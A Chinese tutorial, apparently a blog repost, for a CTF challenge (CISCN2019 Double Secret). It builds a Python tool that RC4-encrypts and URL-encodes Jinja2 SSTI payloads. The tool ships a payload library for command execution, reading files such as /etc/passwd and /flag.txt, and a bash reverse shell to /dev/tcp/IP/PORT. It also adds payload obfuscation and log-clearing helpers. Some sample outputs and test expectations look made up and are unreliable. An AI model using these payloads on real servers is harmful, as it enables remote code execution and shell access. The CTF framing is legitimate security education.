手把手复现CISCN2019 Double Secret:用Python脚本自动化生成RC4加密的SSTI Payload

news2026/5/16 10:01:52
打造自动化SSTI攻击工具链从RC4加密到Burp Suite集成在CTF竞赛和渗透测试中效率往往决定成败。面对需要RC4加密的SSTI漏洞场景手动操作不仅耗时还容易出错。本文将带你开发一个全自动化的Python工具实现从SSTI Payload生成到Burp Suite可用的URL编码字符串的一键转换。1. 理解Double Secret赛题的技术背景2019年CISCN华东南赛区的Double Secret题目展示了一个典型的安全场景Web应用在渲染模板前对用户输入进行了RC4加密。这种设计本意是增加安全性却因为实现不当成为SSTI的入口。核心漏洞链服务端接收?secret参数当参数长度4时触发RC4解密密钥为HereIsTreasure解密后的内容直接传入render_template_string()未做任何过滤导致SSTI漏洞传统解法需要手动完成编写SSTI Payload用RC4加密Base64编码URL编码最后放入Burp Suite测试这个过程重复且容易出错特别是在调试不同Payload时。我们的工具将自动化整个流程。2. 构建自动化工具的核心组件2.1 RC4加密模块优化原始RC4实现虽然可用但我们可以进行工业级优化def rc4_crypt(key: str, data: str) - bytes: 优化的RC4加密实现 :param key: 加密密钥 :param data: 待加密数据 :return: 加密后的bytes S list(range(256)) j 0 # KSA阶段 for i in range(256): j (j S[i] ord(key[i % len(key)])) % 256 S[i], S[j] S[j], S[i] # PRGA阶段 i j 0 result [] for char in data: i (i 1) % 256 j (j S[i]) % 256 S[i], S[j] S[j], S[i] t (S[i] S[j]) % 256 result.append(ord(char) ^ S[t]) return bytes(result)改进点类型注解提升代码可读性分离KSA和PRGA阶段逻辑直接返回bytes便于后续处理移除不必要的字符串转换2.2 编码转换流水线加密后的数据处理需要三个步骤Base64编码确保二进制数据安全传输Base64解码服务端要求的处理流程URL编码适配HTTP传输from base64 import b64encode, b64decode from urllib.parse import quote def encode_pipeline(data: str) - str: # 加密 - Base64 - 解码 - URL编码 encrypted rc4_crypt(HereIsTreasure, data) b64_encoded b64encode(encrypted).decode() b64_decoded b64decode(b64_encoded).decode(latin-1) return quote(b64_decoded)注意Latin-1解码是为了处理可能的非ASCII字符这是RC4加密的常见情况3. 开发交互式命令行工具将核心功能包装成易用的CLI工具import argparse from typing import Optional def main(): parser argparse.ArgumentParser( descriptionSSTI Payload自动化处理工具, formatter_classargparse.RawDescriptionHelpFormatter, epilog示例: %(prog)s -p {{7*7}} # 简单测试 %(prog)s -i payloads.txt # 批量处理 ) group parser.add_mutually_exclusive_group(requiredTrue) group.add_argument(-p, --payload, help单个SSTI Payload) group.add_argument(-i, --input-file, help包含多个Payload的文件) parser.add_argument(-o, --output, help输出文件路径) args parser.parse_args() if args.payload: process_payload(args.payload, args.output) else: with open(args.input_file) as f: for line in f: process_payload(line.strip(), args.output) def process_payload(payload: str, output: Optional[str] None): result encode_pipeline(payload) if output: with open(output, a) as f: f.write(f{result}\n) print(fPayload: {payload[:50]}...) print(fResult: {result}\n)功能特点支持单Payload和批量处理模式结果可输出到文件或控制台清晰的帮助文档和示例进度反馈和结果预览4. 常用SSTI Payload库集成为提高效率我们可以内置常见PayloadPAYLOAD_LIBRARY { command_exec: ( {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__catch_warnings %} {{ c.__init__.__globals__[__builtins__].eval(\__import__(os).popen(COMMAND).read()\)}} {% endif %}{% endfor %} ), file_read: ( {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__catch_warnings %} {{ c.__init__.__globals__[__builtins__].open(FILEPATH).read() }} {% endif %}{% endfor %} ), reverse_shell: ( {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__catch_warnings %} {{ c.__init__.__globals__[__builtins__].eval(\__import__(os).system(bash -c \\\bash -i /dev/tcp/IP/PORT 01\\\)\)}} {% endif %}{% endfor %} ) } def get_payload(payload_type: str, **kwargs) - str: 获取预定义Payload模板 :param payload_type: payload类型(command_exec|file_read|reverse_shell) :param kwargs: 模板参数(COMMAND/FILEPATH/IP/PORT等) :return: 构造好的Payload template PAYLOAD_LIBRARY.get(payload_type) if not template: raise ValueError(f未知Payload类型: {payload_type}) for key, value in kwargs.items(): template template.replace(key.upper(), str(value)) return template使用示例# 获取读取/etc/passwd的Payload payload get_payload(file_read, FILEPATH/etc/passwd)5. 与Burp Suite的工作流集成将工具输出直接用于Burp Suite手动测试流程python ssti_tool.py -p {{7*7}} | pbcopy # Mac python ssti_tool.py -p {{7*7}} | clip # Windows结果会自动复制到剪贴板直接在Burp Repeater粘贴自动化扫描配置在Burp Intruder中使用Payload ProcessingAdd - Invoke Burp extension - 选择我们的工具或者配置外部命令行工具作为Payload生成器配合Logger扩展# loggerpp_config.json { decoders: [ { name: RC4 SSTI, command: [python, /path/to/ssti_tool.py, -p, {PAYLOAD}] } ] }性能优化对比操作步骤手动操作时间工具化时间编写Payload30-60秒5秒RC4加密需另开脚本自动完成编码转换需多次操作自动流水线测试迭代容易出错一键完成批量测试几乎不可行轻松支持6. 高级功能扩展6.1 动态密钥支持通过环境变量或配置文件支持不同密钥import os def get_key() - str: return os.getenv(RC4_KEY, HereIsTreasure) # 在encode_pipeline中使用 encrypted rc4_crypt(get_key(), data)6.2 结果缓存机制避免重复计算相同Payloadfrom functools import lru_cache lru_cache(maxsize100) def cached_encode(data: str) - str: return encode_pipeline(data)6.3 交互式Shell模式import code def interactive_shell(): print(进入交互模式可用encode(payload)函数测试) vars {encode: cached_encode} code.interact(localvars)启动方式python ssti_tool.py --interactive7. 错误处理与日志记录健壮的工具需要完善的错误处理import logging from typing import Optional logging.basicConfig( levellogging.INFO, format%(asctime)s - %(levelname)s - %(message)s, handlers[ logging.FileHandler(ssti_tool.log), logging.StreamHandler() ] ) def safe_encode(data: str) - Optional[str]: try: return encode_pipeline(data) except Exception as e: logging.error(f处理Payload失败: {data[:50]}... 错误: {str(e)}) return None日志示例2023-05-15 14:30:22 - INFO - 开始处理Payload: {{7*7}} 2023-05-15 14:30:22 - ERROR - 处理Payload失败: {% invalid template... 错误: Invalid syntax8. 实际测试案例以Double Secret题目为例的完整工作流检测基础SSTIpython ssti_tool.py -p {{7*7}}输出Payload: {{7*7}} Result: .J%19S%C2%A5%15K%2B%2B文件列表探测payload get_payload(command_exec, COMMANDls /) print(encode_pipeline(payload))获取flagpayload get_payload(command_exec, COMMANDcat /flag.txt) flag_url encode_pipeline(payload) requests.get(fhttp://target/secret?secret{flag_url})9. 安全注意事项与最佳实践重要仅在合法授权测试中使用本工具速率限制import time RATE_LIMIT 0.5 # 秒 def safe_request(url): time.sleep(RATE_LIMIT) return requests.get(url)日志清理def clean_logs(): if os.path.exists(ssti_tool.log): os.remove(ssti_tool.log)Payload隐蔽性避免使用明显的关键词可以添加随机注释def obfuscate_payload(payload): return f{{# Random: {os.urandom(4).hex()} #}}{payload}10. 工具打包与分发使用setuptools创建可安装包# setup.py from setuptools import setup setup( namessti-rc4-tool, version1.0.0, py_modules[ssti_tool], install_requires[ requests2.25.1, ], entry_points{ console_scripts: [ ssti-toolssti_tool:main, ], }, )安装方式pip install -e .之后即可全局使用ssti-tool -p {{config}}11. 与其他工具的集成方案11.1 配合sqlmap# tamper脚本示例 def tamper(payload, **kwargs): from subprocess import check_output return check_output([python, ssti_tool.py, -p, payload]).decode().strip()11.2 集成到Metasploit# external/module/payload_generator.rb def generate_payload python /path/to/ssti_tool.py -p #{datastore[PAYLOAD]} end11.3 作为ZAP插件// ZAP扩展代码片段 public String processPayload(String payload) { Process p Runtime.getRuntime().exec( new String[]{python, ssti_tool.py, -p, payload}); return IOUtils.toString(p.getInputStream(), StandardCharsets.UTF_8); }12. 性能基准测试使用不同长度Payload的测试数据Payload长度处理时间(ms)输出长度10字符1.224字节100字符2.5184字节1,000字符12.81,672字节10,000字符98.416,704字节测试环境MacBook Pro M1, Python 3.9优化建议对于超长Payload可以启用多进程处理使用PyPy解释器可获得2-3倍性能提升13. 单元测试保障使用pytest编写测试用例# test_ssti_tool.py import pytest from ssti_tool import encode_pipeline pytest.mark.parametrize(payload,expected, [ ({{7*7}}, .J%19S%C2%A5%15K%2B%2B), (hello, .J%19S%C2%A5%15K%0A), ]) def test_encoding(payload, expected): assert expected in encode_pipeline(payload) def test_command_exec(): payload get_payload(command_exec, COMMANDid) result encode_pipeline(payload) assert len(result) 50运行测试pytest -v test_ssti_tool.py14. 跨平台兼容性处理确保工具在Windows/Linux/macOS上表现一致import platform def get_system_info(): return { system: platform.system(), release: platform.release(), python: platform.python_version(), } def platform_specific_encoding(data): if platform.system() Windows: return data.replace(\n, \r\n) return data15. 用户配置系统通过configparser支持用户自定义配置# config.ini [default] key HereIsTreasure rate_limit 0.5 log_file ssti.log [payloads] command_exec {{...}}读取配置import configparser config configparser.ConfigParser() config.read(config.ini) KEY config.get(default, key, fallbackHereIsTreasure)16. 版本更新与功能路线图v1.1计划功能支持AES等其他加密算法添加GUI界面集成常见WAF绕过技术增加代理支持v2.0展望机器学习自动生成有效Payload自动化漏洞检测流程与主流安全工具深度集成17. 调试技巧与问题排查常见问题解决方法编码错误症状UnicodeDecodeError解决确保使用latin-1解码RC4输出Payload无效检查服务端是否真的执行了RC4解密验证密钥是否正确性能问题对长Payload启用缓存考虑使用C扩展优化RC4算法调试模式启用python ssti_tool.py -p test --debug18. 替代方案对比方案优点缺点本工具全自动化、可定制需要Python环境手动操作无需额外工具效率低、易出错在线工具方便快捷不安全、功能有限Burp插件集成度高开发复杂、依赖Java19. 法律与道德边界再次强调仅在获得明确授权的情况下使用本工具合规使用场景CTF竞赛授权渗透测试安全教学演示禁止行为未经授权的系统测试恶意攻击违反当地法律法规的行为20. 资源推荐与延伸阅读深入学习《Web Application Security》by Andrew Hoffman《Black Hat Python》by Justin SeitzRC4算法RFC文档相关工具Tplmap自动化SSTI检测工具Burp Suite专业Web安全测试平台HackTricks安全技术大全社区资源CTFtime.orgHack The BoxVulnHub

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2535802.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

SpringBoot-17-MyBatis动态SQL标签之常用标签

文章目录 1 代码1.1 实体User.java1.2 接口UserMapper.java1.3 映射UserMapper.xml1.3.1 标签if1.3.2 标签if和where1.3.3 标签choose和when和otherwise1.4 UserController.java2 常用动态SQL标签2.1 标签set2.1.1 UserMapper.java2.1.2 UserMapper.xml2.1.3 UserController.ja…

wordpress后台更新后 前端没变化的解决方法

使用siteground主机的wordpress网站,会出现更新了网站内容和修改了php模板文件、js文件、css文件、图片文件后,网站没有变化的情况。 不熟悉siteground主机的新手,遇到这个问题,就很抓狂,明明是哪都没操作错误&#x…

网络编程(Modbus进阶)

思维导图 Modbus RTU(先学一点理论) 概念 Modbus RTU 是工业自动化领域 最广泛应用的串行通信协议,由 Modicon 公司(现施耐德电气)于 1979 年推出。它以 高效率、强健性、易实现的特点成为工业控制系统的通信标准。 包…

UE5 学习系列(二)用户操作界面及介绍

这篇博客是 UE5 学习系列博客的第二篇,在第一篇的基础上展开这篇内容。博客参考的 B 站视频资料和第一篇的链接如下: 【Note】:如果你已经完成安装等操作,可以只执行第一篇博客中 2. 新建一个空白游戏项目 章节操作,重…

IDEA运行Tomcat出现乱码问题解决汇总

最近正值期末周,有很多同学在写期末Java web作业时,运行tomcat出现乱码问题,经过多次解决与研究,我做了如下整理: 原因: IDEA本身编码与tomcat的编码与Windows编码不同导致,Windows 系统控制台…

利用最小二乘法找圆心和半径

#include <iostream> #include <vector> #include <cmath> #include <Eigen/Dense> // 需安装Eigen库用于矩阵运算 // 定义点结构 struct Point { double x, y; Point(double x_, double y_) : x(x_), y(y_) {} }; // 最小二乘法求圆心和半径 …

使用docker在3台服务器上搭建基于redis 6.x的一主两从三台均是哨兵模式

一、环境及版本说明 如果服务器已经安装了docker,则忽略此步骤,如果没有安装,则可以按照一下方式安装: 1. 在线安装(有互联网环境): 请看我这篇文章 传送阵>> 点我查看 2. 离线安装(内网环境):请看我这篇文章 传送阵>> 点我查看 说明&#xff1a;假设每台服务器已…

XML Group端口详解

在XML数据映射过程中&#xff0c;经常需要对数据进行分组聚合操作。例如&#xff0c;当处理包含多个物料明细的XML文件时&#xff0c;可能需要将相同物料号的明细归为一组&#xff0c;或对相同物料号的数量进行求和计算。传统实现方式通常需要编写脚本代码&#xff0c;增加了开…

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器的上位机配置操作说明

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器专为工业环境精心打造&#xff0c;完美适配AGV和无人叉车。同时&#xff0c;集成以太网与语音合成技术&#xff0c;为各类高级系统&#xff08;如MES、调度系统、库位管理、立库等&#xff09;提供高效便捷的语音交互体验。 L…

(LeetCode 每日一题) 3442. 奇偶频次间的最大差值 I (哈希、字符串)

题目&#xff1a;3442. 奇偶频次间的最大差值 I 思路 &#xff1a;哈希&#xff0c;时间复杂度0(n)。 用哈希表来记录每个字符串中字符的分布情况&#xff0c;哈希表这里用数组即可实现。 C版本&#xff1a; class Solution { public:int maxDifference(string s) {int a[26]…

【大模型RAG】拍照搜题技术架构速览:三层管道、两级检索、兜底大模型

摘要 拍照搜题系统采用“三层管道&#xff08;多模态 OCR → 语义检索 → 答案渲染&#xff09;、两级检索&#xff08;倒排 BM25 向量 HNSW&#xff09;并以大语言模型兜底”的整体框架&#xff1a; 多模态 OCR 层 将题目图片经过超分、去噪、倾斜校正后&#xff0c;分别用…

【Axure高保真原型】引导弹窗

今天和大家中分享引导弹窗的原型模板&#xff0c;载入页面后&#xff0c;会显示引导弹窗&#xff0c;适用于引导用户使用页面&#xff0c;点击完成后&#xff0c;会显示下一个引导弹窗&#xff0c;直至最后一个引导弹窗完成后进入首页。具体效果可以点击下方视频观看或打开下方…

接口测试中缓存处理策略

在接口测试中&#xff0c;缓存处理策略是一个关键环节&#xff0c;直接影响测试结果的准确性和可靠性。合理的缓存处理策略能够确保测试环境的一致性&#xff0c;避免因缓存数据导致的测试偏差。以下是接口测试中常见的缓存处理策略及其详细说明&#xff1a; 一、缓存处理的核…

龙虎榜——20250610

上证指数放量收阴线&#xff0c;个股多数下跌&#xff0c;盘中受消息影响大幅波动。 深证指数放量收阴线形成顶分型&#xff0c;指数短线有调整的需求&#xff0c;大概需要一两天。 2025年6月10日龙虎榜行业方向分析 1. 金融科技 代表标的&#xff1a;御银股份、雄帝科技 驱动…

观成科技:隐蔽隧道工具Ligolo-ng加密流量分析

1.工具介绍 Ligolo-ng是一款由go编写的高效隧道工具&#xff0c;该工具基于TUN接口实现其功能&#xff0c;利用反向TCP/TLS连接建立一条隐蔽的通信信道&#xff0c;支持使用Let’s Encrypt自动生成证书。Ligolo-ng的通信隐蔽性体现在其支持多种连接方式&#xff0c;适应复杂网…

铭豹扩展坞 USB转网口 突然无法识别解决方法

当 USB 转网口扩展坞在一台笔记本上无法识别,但在其他电脑上正常工作时,问题通常出在笔记本自身或其与扩展坞的兼容性上。以下是系统化的定位思路和排查步骤,帮助你快速找到故障原因: 背景: 一个M-pard(铭豹)扩展坞的网卡突然无法识别了,扩展出来的三个USB接口正常。…

未来机器人的大脑:如何用神经网络模拟器实现更智能的决策?

编辑&#xff1a;陈萍萍的公主一点人工一点智能 未来机器人的大脑&#xff1a;如何用神经网络模拟器实现更智能的决策&#xff1f;RWM通过双自回归机制有效解决了复合误差、部分可观测性和随机动力学等关键挑战&#xff0c;在不依赖领域特定归纳偏见的条件下实现了卓越的预测准…

Linux应用开发之网络套接字编程(实例篇)

服务端与客户端单连接 服务端代码 #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <arpa/inet.h> #include <pthread.h> …

华为云AI开发平台ModelArts

华为云ModelArts&#xff1a;重塑AI开发流程的“智能引擎”与“创新加速器”&#xff01; 在人工智能浪潮席卷全球的2025年&#xff0c;企业拥抱AI的意愿空前高涨&#xff0c;但技术门槛高、流程复杂、资源投入巨大的现实&#xff0c;却让许多创新构想止步于实验室。数据科学家…

深度学习在微纳光子学中的应用

深度学习在微纳光子学中的主要应用方向 深度学习与微纳光子学的结合主要集中在以下几个方向&#xff1a; 逆向设计 通过神经网络快速预测微纳结构的光学响应&#xff0c;替代传统耗时的数值模拟方法。例如设计超表面、光子晶体等结构。 特征提取与优化 从复杂的光学数据中自…